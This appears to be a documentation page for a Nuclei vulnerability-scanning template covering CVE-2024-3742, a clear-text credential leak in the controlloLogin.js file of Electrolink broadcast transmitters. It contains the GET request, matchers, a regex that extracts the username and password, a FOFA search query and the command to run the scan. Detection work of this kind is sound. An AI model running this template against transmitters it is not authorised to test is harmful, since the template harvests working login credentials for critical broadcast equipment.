Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure
ID: CVE-2024-3742
Severity: high
Author: Farish
Tags: packetstorm,cve,cve2024,electrolink,info-leak
Description
Section titled “Description”Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system.
YAML Source
Section titled “YAML Source”id: CVE-2024-3742
info: name: Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure author: Farish severity: high description: | Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php - https://nvd.nist.gov/vuln/detail/CVE-2024-3742 - https://packetstormsecurity.com/files/174875/ - https://www.cisa.gov/news-events/ics-advisories/icsa-24-107-02 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-3742 cwe-id: CWE-312 epss-score: 0.00043 epss-percentile: 0.09257 metadata: verified: true max-request: 1 fofa-query: "Electrolink s.r.l." tags: packetstorm,cve,cve2024,electrolink,info-leak
http: - raw: - | GET /controlloLogin.js HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(content_type, "application/x-javascript")' - 'contains(body, "user==") && contains(body, "password==")' - 'status_code == 200' condition: and
extractors: - type: regex part: body regex: - user\s*==\s*'([^']*)'\s*&&\s*password\s*==\s*'([^']*)'# digest: 490a00463044021f2845205cac2ecdeba0e591e27f9014380b3cc5dd7d5f34d207e2b49c3302cf022100b0bf770a389c7308249eccc4b0aff30c6f652dc1b4a6c6dff66f9733e6221ac3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-3742.yaml"